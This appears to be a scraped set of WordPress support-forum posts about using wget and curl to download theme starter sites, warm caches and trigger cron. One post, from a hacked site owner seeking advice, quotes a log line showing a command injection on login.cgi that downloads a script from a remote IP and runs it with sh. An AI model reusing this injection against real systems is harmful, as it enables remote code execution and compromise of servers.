For security reasons, wordpress config is set with WP_HTTP_BLOCK_EXTERNAL
. Moreover, our firewall blocks the web server from being able to initiate requests. To install plugins and themes, we do this manually with scp
and ssh
.
define( 'WP_HTTP_BLOCK_EXTERNAL', true );
It’s trivial to download .zip files of plugins and themes from www.ads-software.com, but I can’t for the life of me figure out how to download Website Templates from the Astra website. I can preview it, but where the heck is the download button!?!
Where can I download a Website Templates (with wget
or curl
) for Astra?
For security reasons, wordpress config is set with WP_HTTP_BLOCK_EXTERNAL
. Moreover, our firewall blocks the web server from being able to initiate requests. To install plugins and themes, we do this manually with scp
and ssh
.
define( 'WP_HTTP_BLOCK_EXTERNAL', true );
It’s trivial to download .zip files of plugins and themes from www.ads-software.com, but I can’t for the life of me figure out how to download Starter Sites from the Themeisle website’s “Starter Sites” section. I can preview it, but where the heck is the download button!?!
Where can I download a Starter Site (with wget
or curl
) from the Neve Website’s “Starter Sites” section?
For security reasons, wordpress config is set with WP_HTTP_BLOCK_EXTERNAL
. Moreover, our firewall blocks the web server from being able to initiate requests. To install plugins and themes, we do this manually with scp
and ssh
.
define( 'WP_HTTP_BLOCK_EXTERNAL', true );
It’s trivial to download .zip files of plugins and themes from www.ads-software.com, but I can’t for the life of me figure out how to download Starter Sites from the GeneratePress website’s “Site Library” section. I can preview it, but where the heck is the download button!?!
Where can I download a Starter Site (with wget
or curl
) from the GeneratePress Site Library?
I’m trying to use wget to populate the cache but haven’t been able to figure out the appropriate options to make this happen.
I’ve tried the following:
wget –save-cookies cookies.txt –no-cache –no-proxy -p -U “Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36” https://mywebsite.com/example/
but the page doesn’t get cached. When I browse with a real web browser the page doesn’t display instantly like it would when it’s cached.
I’ve run the wget from both the web host as well as from a remote client but have been unsuccessful.
What wget options should I use to populate the litespeed cache?
]]>wget -O- "https://mydomain.com/?action=wpfastestcache&type=clearcache&url=https%3A%2F%2Fmydomain.com%2Fpost-1234&token=xyz123"
]]>when i navigate on www.my-site.com,
the browser connect to nginx 10.42.0.84
then nginx connect to php 10.42.0.87 on port 9000
Now the problem on simply static is that this want connect to 10.42.0.87
it doesn’t know that it must connect to 10.42.0.84
it’s possibile set in the plugin the real ip ?
Another solution would be to connect to the www.my-site.com domain name and not to the IP
Can you tell me which function detects the ip ?
in which file?
I was thinking of temporarily forcing the right IP directly into the code
]]>pleace can You help?
Our site was a hack. We use wordfence free.
(We used a paid license before that)
I found that the attacker wrote the script to the url address.
I found it in Google Analytics
/login.cgi?cli=aa aa’;wget https://217.61.6.127/t -O -> /tmp/t;sh /tmp/t’$ HTTP/1.1″ 400 0 “-” “Hello, World
Please advise us how to protect our web site from being attacked.
I will buy the license again.
Thank You and have a nice day
Vit
]]>Quick question – I noticed that when requesting wp-cron.php, I get the standard cache control header returned (in my case A3600
(1 hour). I disable wp-cron by default and use a “real cron job” to call wp-cron.php?doing_wp_cron
via wget
every 5 minutes however I noticed this morning that it didn’t “work” correctly until I called it directly from my machine.
My question, therefore, is – because I have the cron job being called from my server, is the cache-control header interfering and not allowing the wget
command to “correctly” execute every 5 minutes – instead the response is coming from cache instead?
I understand one can preload the entire site using wget https://www.example.com/?action=wpfastestcache&type=preload
But, what if I want to preload only specific urls (for example- page1, page2, etc.). Will following syntax work?
wget https://www.example.com/page1/?action=wpfastestcache&type=preload
wget https://www.example.com/page2/?action=wpfastestcache&type=preload
Also, can I do the wget from my desktop instead of setting on cron job?
]]>